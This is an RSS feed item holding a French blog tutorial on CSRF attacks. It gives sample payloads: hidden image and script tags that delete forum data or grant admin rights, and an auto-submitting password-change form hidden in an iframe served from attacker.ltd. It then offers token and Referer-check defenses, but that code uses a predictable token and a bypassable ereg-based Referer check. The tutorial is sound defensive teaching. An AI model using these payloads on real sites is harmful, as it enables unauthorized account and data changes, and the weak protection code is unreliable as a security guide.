<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mohammed CHERIFI &#187; csrf injection</title>
	<atom:link href="http://www.mcherifi.org/tag/csrf-injection/feed" rel="self" type="application/rss+xml" />
	<link>http://www.mcherifi.org</link>
	<description>Another Web Developper Blog!</description>
	<lastBuildDate>Tue, 31 Jan 2012 18:42:15 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Se protéger contre les attaques CSRF Injection</title>
		<link>http://www.mcherifi.org/hacking/les-attaques-csrf-injection.html</link>
		<comments>http://www.mcherifi.org/hacking/les-attaques-csrf-injection.html#comments</comments>
		<pubDate>Fri, 07 Aug 2009 06:36:51 +0000</pubDate>
		<dc:creator>Mohammed CHERIFI</dc:creator>
				<category><![CDATA[Développement WEB]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[cross site request forgories]]></category>
		<category><![CDATA[csrf injection]]></category>
		<category><![CDATA[xsrf]]></category>
		<category><![CDATA[xsrf injection]]></category>

		<guid isPermaLink="false">http://mcherifi.org/?p=44</guid>
		<description><![CDATA[TweetCSRF Injection (Cross Site Request Forgeries) est une classe d&#8217;attaque propre aux applications WEB qui a toujours existé mais qui reste moins connue! son exploitation par un attaquant malveillant peut avoir des conséquences dramatique sur un système d&#8217;information.
Dans ce billet, je vais vous expliquer ce que c&#8217;est une attaque de type CSRF Injection, avec des [...]]]></description>
			<content:encoded><![CDATA[<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://www.mcherifi.org/hacking/les-attaques-csrf-injection.html" data-text="Se protéger contre les attaques CSRF Injection" data-count="horizontal">Tweet</a><p>CSRF Injection (Cross Site Request Forgeries) est une classe d&#8217;attaque propre aux applications WEB qui a toujours existé mais qui reste moins connue! son exploitation par un attaquant malveillant peut avoir des conséquences dramatique sur un système d&#8217;information.</p>
<p>Dans ce billet, je vais vous expliquer ce que c&#8217;est une attaque de type CSRF Injection, avec des exemples d&#8217;exploitation illustrés ainsi que des mesures de protection qui peuvent être implémentés.</p>
<h2>CSRF c&#8217;est quoi?</h2>
<p>Une attaque CSRF se repose sur l&#8217;exploitation de la confiance d&#8217;une application WEB vis à vis ses clients, l&#8217;objectif de cette dernière est de forcer le navigateur à envoyer une requête &laquo;&nbsp;forgée&nbsp;&raquo; à l&#8217;insu d&#8217;un internaute connecté à son compte  avec les privilèges de ce dernier,  autrement dit : « Je n&#8217;ai pas les droits pour faire une action, je m’arrange alors pour que l’utilisateur ayant les privilèges nécessaires la fasse à ma place (sans qu’il soit au courant bien entendu) ».</p>
<p>Ce type d&#8217;attaque n&#8217;est pas difficile à mettre en œuvre, il peut être mené par n&#8217;importe qui par un simple lien ou script caché dans un email ou une page WEB, on suivant le lien contrefait le navigateur de la victime exécutera le code avec les permissions qu&#8217;a ce dernier sur le site vulnérable (forum, blog, espace membre..).</p>
<h2>Quelques exemples d&#8217;exploitation:</h2>
<p>Pour illustrer la facilité de la mise en œuvre d&#8217;une attaque CSRF avec des exemples concrets: Je vais prendre l&#8217;exemple d&#8217;un forum qui n&#8217;as pas pensé à se protéger contre ce type de faille, son administrateur connecté à son espace admin visite une page contenant l&#8217;un de ces codes :</p>
<h3>Exemple avec des requêtes GET</h3>
<p><em>Suppression de tous les topics d&#8217;un forum</em></p>
<pre class="brush: html">&lt;img src=&quot;http://www.victime.ltd/forum/admin/delete.php?msg=all&quot; alt=&quot;&quot; width=&quot;0&quot; height=&quot;0&quot; /&gt;</pre>
<p>
<em> Suppression d&#8217;un utilisateur :</em></p>
<pre class="brush: html">&lt;script src=&quot;http://www.victime.ltd/forum/admin/deleteuser.php?username=toto&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;</pre>
<p>
<em>Donner les drois d&#8217;administrateur à l&#8217;utilisateur haxor</em></p>
<pre class="brush: html">&lt;span style=&quot;background:url(http://www.victime.ltd/forum/admin/addadmin.php?username=haxor&quot;&gt;Hello master&lt;/span&gt;</pre>
</p>
<h3><strong>Comment ça marche?</strong></h3>
<p>Lorsque l&#8217;administrateur du forum visite une page contenant l&#8217;un de ces codes, son navigateur va essayer de charger l’image se trouvant à l’adresse indiquée par la balise &laquo;&nbsp;&lt;img&gt;&nbsp;&raquo;  sans se douter que ce n’est pas une image. Le serveur du forum va donc exécuter la page et supprimer tous les messages en croyant que c’est l’administrateur qui a demandé la suppression!</p>
<p>On partant sur le même principe le deuxième et troisième exemples illustrent l&#8217;utilisation des balises HTML avec différents attributs où le but est toujours de forcer le navigateur à appeler une page web du site victime via une requête HTTP de type GET, cette page sera interprétée par le serveur ce qui mènera à des actions non désirés par le client possédant des droits privilégiés!</p>
<h3><strong>Exemple avec une requête POST</strong></h3>
<p>On suppose que sur notre forum nous avons un formulaire de modification de mot de passe et qu&#8217;on souhaite forger une requête HTTP de type POST pour forcer le navigateur à poster les données afin de modifier le mot de passe du client (toujours à son insu bien entendu).</p>
<p>voici à quoi le code du formulaire peut ressembler</p>
<p>
<pre class="brush: html">
&lt;form action=&quot;/user/changepasswd.php&quot; method=&quot;post&quot;&gt;
Entrez votre nouveau mot de passe :
&lt;input type=&quot;hidden&quot; name=&quot;new_password&quot; value=&quot;&quot; /&gt;
Confirmer le nouveau mot de passe :
&lt;input type=&quot;hidden&quot; name=&quot;new_password_confirm&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Enregistrer les modification&quot; /&gt;
&lt;/form&gt;
</pre>
</p>
<p>L&#8217;objectif est d&#8217;effectuer une requête HTTP de type POST vers la page <em>changepasswd.php</em> avec les champs <em>new_password</em> et <em>new_password_confirm</em> pré-remplis, avec le nouveau passe souhaité par l&#8217;attaquant, pour cela un attaquant peut procéder ainsi :</p>
<ol>
<li>Création d&#8217;une première page qui contient le formulaire pré-remplis avec comme &laquo;&nbsp;action&nbsp;&raquo; l&#8217;url du site victime</li>
<li>Mettre en place un code javascript pour soumettre le formulaire au chargement de la page</li>
<li>Créer une deuxième page pour cacher la première dans un &lt;iframe&gt; afin de cacher ce qui se passe derrière ;)</li>
</ol>
<p>D&#8217;où le code de la première page (on la nome csrfpost.html) est :</p>
<p>
<pre class="brush: html">
&lt;script type=&quot;text/javascript&quot;&gt;
window.onload = function(){
document.getElementById(&quot;csrf_form&quot;).submit();
}
&lt;/script&gt;
&lt;form id=&quot;csrf_form&quot; action=&quot;http://www.victime.ltd/user/changepasswd.php&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_password&quot; value=&quot;pwn3d&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_password_confirm&quot; value=&quot;pwn3d&quot; /&gt;
&lt;/form&gt;
</pre>
</p>
<p>Le code de la deuxième page devrai contenir un &lt;iframe&gt; caché avec d&#8217;éventuel contenu pour que la victime ne se doute pas!</p>
<p>
<pre class="brush: html">
Hello master
&lt;iframe src=&quot;http://attacker.ltd/csrfpost.html&quot; width=&quot;1&quot; height=&quot;1&quot; style=&quot;display:none;&quot;&gt;&lt;/iframe&gt;
</pre>
</p>
<p>De cette manière l&#8217;iframe appelera la page csrfpost.html qui postera la requête post forgée vers la page <em>http://www.victime.ltd/user/changepasswd.php </em>et qui de son tour sera exécuté par le serveur du site vulnerable, et le password sera modifié par un nouveau ( &laquo;&nbsp;pwn3d&nbsp;&raquo; dans notre cas)!</p>
<p>Faites gaffe alors lorsqu&#8217;on vous incitent, à visiter un lien quelconque, et si jamais vous avez suivis un lien et que le contenu de la page ne vous dit rien; examinez le code source!  il y a de forte possibilités qu&#8217;il s&#8217;agit d&#8217;une attaque CSRF.</p>
<h2>Comment se protéger ?</h2>
<p>Il est assez difficile de détecter une attaque CSRF même en utilisant un antivirus ou un firewall, alors là l&#8217;antivirus c&#8217;est vous! L&#8217;objectif est d&#8217;empêcher le navigateur à effectuer des recettes à l&#8217;insu du client ou sans accord préalable de ce dernier.<br />
Pour cela voici des mesures à prendre en compte :</p>
<ul>
<li>Ne pas suivre les liens suspects</li>
<li>Ne pas sauvegarder vos identifiants dans votre navigateur</li>
<li>Toujours se déconnecter à la fin d&#8217;utilisation de vos comptes</li>
<li>Utilisez un deuxième navigateur pour les sites suspects</li>
<li>Désactiver l&#8217;interprétation du code HTML dans vos client WEBMail</li>
</ul>
<h2>Comment sécuriser son code?</h2>
<p>Si vous êtes développeur<strong>, </strong>voici quelques bonnes pratiques à implémenter dans vos codes:</p>
<ul>
<li>Toujours utiliser des pages de confirmation et demander la validation du client avant toute action critique</li>
<li>Utiliser des jetons de sécurité (tokenid) dans tous vos pages sensibles (voir l&#8217;exemple)</li>
<li>Vérifier l&#8217;URL de provenance (HTTP_REFERER) pour prévenir des requêtes POST forgées (voir l&#8217; exemple)</li>
</ul>
<h3><span style="text-decoration: underline;">Utiliser des jetons:</span></h3>
<p>L&#8217;utilisation d&#8217;un jeton de sécurité est primordiale pour une application qui se respecte, personnellement je trouve que c&#8217;est la meilleure solution pour se protéger contre les attaques CSRF!</p>
<p><span style="text-decoration: underline;">Pour les requêtes HTTP de type GET:</span></p>
<p>On deverai avoir 2 pages, une page de confirmation qui servira à la génération d&#8217;une clé aléatoire (jeton) et la stocker dans une variable de session, ainsi tous les liens qui servent d&#8217;effectuer des actions sensibles porteront ce jeton dans une variable GET, le contenu de cette variable sera vérifié dans la deuxième page qui exécute l&#8217;action.</p>
<p>Exemple de page de confirmation avec une requête GET :</p>
<p>
<pre class="brush: php">
&lt;?php
session_start();
// on génere une clé aléatoire de 32 caractères et on la met dans notre variable de session
$_SESSION[&#039;tokenid&#039;] = str_shuffle(md5(microtime(true)));
?&gt;
Etes vous sûre de vouloir supprimer l&#039;utilisateur toto ??
&lt;a href=&quot;supprimer_utilisateur.php?username=toto&amp;amp;amp;tokenid=&lt;?php echo $_SESSION[&#039;tokenid&#039;] ?&gt;&quot;&gt;Supprimer&lt;/a&gt;
&lt;a href=&quot;javascript:history.back();&quot;&gt;Annuler&lt;/a&gt;
</pre>
</p>
<p>Dans la page <em>supprimer_utilisateur.php </em></p>
<p>
<pre class="brush: php">
&lt;?php
session_start();
// on verifie la clé de securité avant de procéder au traitement
if(!empty($_GET[&#039;tokenid&#039;]) &amp;amp;amp;&amp;amp;amp; $_GET[&#039;tokenid&#039;] == $_SESSION[&#039;tokenid&#039;]){
// on détruit la session ne pas la réutiliser par un utilisateur malveillant
unset($_SESSION[&#039;tokenid&#039;]);
// on efféctue le traitement
}
else{
die(&quot;Votre session a expirée&quot;);
}
?&gt;
</pre>
</p>
<p><span style="text-decoration: underline;">Pour les requêtes HTTP de type POST</span></p>
<p>Quant aux requêtes HTTP de type POST c&#8217;est toujours le même principe que pour GET sauf qu&#8217;au lieu de passer le jeton en paramètre dans le lien on le mets dans un champs caché de type &laquo;&nbsp;hidden&nbsp;&raquo;.</p>
<p>On reprends l&#8217;exemple mentionné en haut mais cette fois-ci securisé =)</p>
<p>
<pre class="brush: php">
&lt;?php
session_start();
$_SESSION[&#039;tokenid&#039;] = str_shuffle(md5(microtime(true)));
?&gt;
&lt;form action=&quot;/user/changepasswd.php&quot; method=&quot;post&quot;&gt;
Entrez votre nouveau mot de passe :
&lt;input type=&quot;hidden&quot; name=&quot;new_password&quot; value=&quot;&quot; /&gt;
Confirmer le nouveau mot de passe :
&lt;input type=&quot;hidden&quot; name=&quot;new_password_confirm&quot; value=&quot;&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Enregistrer les modification&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;tokenid&quot; value=&quot;&lt;?php echo $_SESSION[&#039;tokenid&#039;] ?&gt;&quot; /&gt;
&lt;/form&gt;
</pre>
</p>
<p>Et dans le fichier <em>changepasswd.php</em></p>
<p>
<pre class="brush: php">
&lt;?php
session_start();
// on verifie la clé de securité avant de procéder au traitement
if(!empty($_POST[&#039;tokenid&#039;])  &amp;amp;amp;&amp;amp;amp; $_POST[&#039;tokenid&#039;] == $_SESSION[&#039;tokenid&#039;]){
// on détruit la session pour ne pas la réutiliser par un utilisateur malveillant
unset($_SESSION[&#039;tokenid&#039;]);
// on efféctue le traitement
}
else{
die(&quot;Votre session a expirée&quot;);
}
?&gt;
</pre>
</p>
<p>Ne faite jamais confiance à aucune données récupéré coté client tant que le filtrage n&#8217;as pas été approuvé =)</p>
<h3><span style="text-decoration: underline;">Vérification de l&#8217;url de provenance : </span></h3>
<p>La vérification de l&#8217;url de provenance vous aidera à mieux vous protéger contre les CSRF avec des requêtes POST comme dans l&#8217;exemple expliqué en haut, ce n&#8217;est pas une protection sûre et peut être contourné si l&#8217;attaque provient du même site, mais ça permet comme même d&#8217;éviter plusieurs ennuits ;)</p>
<p>Bref, il suffit de placer le code suivant dans les fichiers qui effectuent des actions sensibles (changement de mot de passe, suppression de données, etc..)</p>
<p>
<pre class="brush: php">
if (!empty($_SERVER[&#039;HTTP_REFERER&#039;])){
if (!ereg($_SERVER[&#039;HTTP_HOST&#039;], $_SERVER[&#039;HTTP_REFERER&#039;])){
die(&quot;Vous ne pouvez pas venir ici!&quot;);
}
}
else{
die(&quot;Referer introuvable&quot;);
}
</pre>
</p>
<h2>Conclusion</h2>
<p>La faille CSRF Injection reste parmi les classes d&#8217;attaques les plus dangereuses sur le WEB vu son exploitation instantanée et les importants dégâts qu&#8217;elle peut engendrer! Je détaillerai dans un prochain billet l&#8217;exploitation avancée de cette dernière ;)</p>
<p>Je rappelle que des gros sites ont étaient victimes de ce type t&#8217;attaque, je cites: Gmail, MySpace, Windows Live Mail, Skyrock, Dynadot et bien d&#8217;autres .. sinon j&#8217;espère que ce tuto vous a été utile et vous a appris de nouvelles notions ;)</p>
<p>Allez, bonne journée à tous!</p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 3213px; width: 1px; height: 1px;">
<p>session_start();</p>
<p>// on verifie la clé de securité avant de procéder au traitement</p>
<p>if(!empty($_GET['uniqid'])  &#038; $_GET['uniqid'] == $_SESSION['tokenid']){</p>
<p>// on efféctue le traitement</p>
<p>}</p>
<p>else{</p>
<p>die(&laquo;&nbsp;Votre session a expirée&nbsp;&raquo;);</p>
<p>}</p>
<p>?&gt;[</p>
</div>



Partager cet article:


	<a rel="nofollow"  target="_blank" href="http://www.mcherifi.org/wp-content/plugins/sociable/awesmate.php?c=twitter&t=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&d=http://twitter.com/home?status=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection%20-%20TARGET" title="Twitter"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.mcherifi.org/wp-content/plugins/sociable/awesmate.php?c=facebook-post&t=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&d=http://www.facebook.com/share.php?u=TARGET%26t=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection" title="Facebook"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;annotation=CSRF%20Injection%20%28Cross%20Site%20Request%20Forgeries%29%20est%20une%20classe%20d%27attaque%20propre%20aux%20applications%20WEB%20qui%20a%20toujours%20exist%C3%A9%20mais%20qui%20reste%20moins%20connue%21%20son%20exploitation%20par%20un%20attaquant%20malveillant%20peut%20avoir%20des%20cons%C3%A9quences%20dramatique%20sur%20un%20syst%C3%A8" title="Google Bookmarks"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://delicious.com/post?url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;notes=CSRF%20Injection%20%28Cross%20Site%20Request%20Forgeries%29%20est%20une%20classe%20d%27attaque%20propre%20aux%20applications%20WEB%20qui%20a%20toujours%20exist%C3%A9%20mais%20qui%20reste%20moins%20connue%21%20son%20exploitation%20par%20un%20attaquant%20malveillant%20peut%20avoir%20des%20cons%C3%A9quences%20dramatique%20sur%20un%20syst%C3%A8" title="del.icio.us"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.netvibes.com/share?title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html" title="Netvibes"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/netvibes.png" title="Netvibes" alt="Netvibes" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.viadeo.com/shareit/share/?url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&urllanguage=fr" title="viadeo FR"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/viadeo.png" title="viadeo FR" alt="viadeo FR" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;bodytext=CSRF%20Injection%20%28Cross%20Site%20Request%20Forgeries%29%20est%20une%20classe%20d%27attaque%20propre%20aux%20applications%20WEB%20qui%20a%20toujours%20exist%C3%A9%20mais%20qui%20reste%20moins%20connue%21%20son%20exploitation%20par%20un%20attaquant%20malveillant%20peut%20avoir%20des%20cons%C3%A9quences%20dramatique%20sur%20un%20syst%C3%A8" title="Digg"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;source=Mohammed+CHERIFI+Another+Web+Developper+Blog%21&amp;summary=CSRF%20Injection%20%28Cross%20Site%20Request%20Forgeries%29%20est%20une%20classe%20d%27attaque%20propre%20aux%20applications%20WEB%20qui%20a%20toujours%20exist%C3%A9%20mais%20qui%20reste%20moins%20connue%21%20son%20exploitation%20par%20un%20attaquant%20malveillant%20peut%20avoir%20des%20cons%C3%A9quences%20dramatique%20sur%20un%20syst%C3%A8" title="LinkedIn"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/linkedin.png" title="LinkedIn" alt="LinkedIn" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://slashdot.org/bookmark.pl?title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html" title="Slashdot"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/slashdot.png" title="Slashdot" alt="Slashdot" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html" title="Sphinn"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection" title="Mixx"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a  target="_blank" href="http://blogplay.com" title="Blogplay"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/blogplay.png" title="Blogplay" alt="Blogplay" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://identi.ca/notice/new?status_textarea=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html" title="Identi.ca"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/identica.png" title="Identi.ca" alt="Identi.ca" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.printfriendly.com/print?url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;partner=sociable" title="Print"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.mcherifi.org/wp-content/plugins/sociable/awesmate.php?c=pingfm&t=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&d=http://ping.fm/ref/?link=TARGET%26title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection%26body=CSRF%20Injection%20%28Cross%20Site%20Request%20Forgeries%29%20est%20une%20classe%20d%27attaque%20propre%20aux%20applications%20WEB%20qui%20a%20toujours%20exist%C3%A9%20mais%20qui%20reste%20moins%20connue%21%20son%20exploitation%20par%20un%20attaquant%20malveillant%20peut%20avoir%20des%20cons%C3%A9quences%20dramatique%20sur%20un%20syst%C3%A8" title="Ping.fm"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/ping.png" title="Ping.fm" alt="Ping.fm" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.mcherifi.org/wp-content/plugins/sociable/awesmate.php?c=mailto&t=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&d=mailto:?subject=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection%26body=TARGET" title="email"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/email_link.png" title="email" alt="email" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://posterous.com/share?linkto=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;selection=CSRF%20Injection%20%28Cross%20Site%20Request%20Forgeries%29%20est%20une%20classe%20d%27attaque%20propre%20aux%20applications%20WEB%20qui%20a%20toujours%20exist%C3%A9%20mais%20qui%20reste%20moins%20connue%21%20son%20exploitation%20par%20un%20attaquant%20malveillant%20peut%20avoir%20des%20cons%C3%A9quences%20dramatique%20sur%20un%20syst%C3%A8" title="Posterous"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/posterous.png" title="Posterous" alt="Posterous" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection" title="Reddit"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/reddit.png" title="Reddit" alt="Reddit" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://buzz.yahoo.com/submit/?submitUrl=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;submitHeadline=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;submitSummary=CSRF%20Injection%20%28Cross%20Site%20Request%20Forgeries%29%20est%20une%20classe%20d%27attaque%20propre%20aux%20applications%20WEB%20qui%20a%20toujours%20exist%C3%A9%20mais%20qui%20reste%20moins%20connue%21%20son%20exploitation%20par%20un%20attaquant%20malveillant%20peut%20avoir%20des%20cons%C3%A9quences%20dramatique%20sur%20un%20syst%C3%A8&amp;submitCategory=science&amp;submitAssetType=text" title="Yahoo! Buzz"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/yahoobuzz.png" title="Yahoo! Buzz" alt="Yahoo! Buzz" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.printfriendly.com/print?url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;partner=sociable" title="PDF"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/pdf.png" title="PDF" alt="PDF" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.mcherifi.org/feed" title="RSS"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/rss.png" title="RSS" alt="RSS" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.diigo.com/post?url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection" title="Diigo"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/diigo.png" title="Diigo" alt="Diigo" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://cgi.fark.com/cgi/fark/farkit.pl?h=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;u=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html" title="Fark"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/fark.png" title="Fark" alt="Fark" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://www.blogospherenews.com/submit.php?url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection" title="Blogosphere News"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/blogospherenews.png" title="Blogosphere News" alt="Blogosphere News" class="sociable-hovers" /></a>
	<a rel="nofollow"  target="_blank" href="http://cimlap.blogter.hu/index.php?action=suggest_link&amp;title=Se%20prot%C3%A9ger%20contre%20les%20attaques%20CSRF%20Injection&amp;url=http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html" title="blogtercimlap"><img src="http://www.mcherifi.org/wp-content/plugins/sociable/images/blogter.png" title="blogtercimlap" alt="blogtercimlap" class="sociable-hovers" /></a>


<br/><br/>
<p class="FacebookLikeButton"><fb:like href="http%3A%2F%2Fwww.mcherifi.org%2Fhacking%2Fles-attaques-csrf-injection.html" layout="standard" show_faces="true" width="450" action="like" colorscheme="light"></fb:like></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mcherifi.org/hacking/les-attaques-csrf-injection.html/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
	</channel>
</rss>

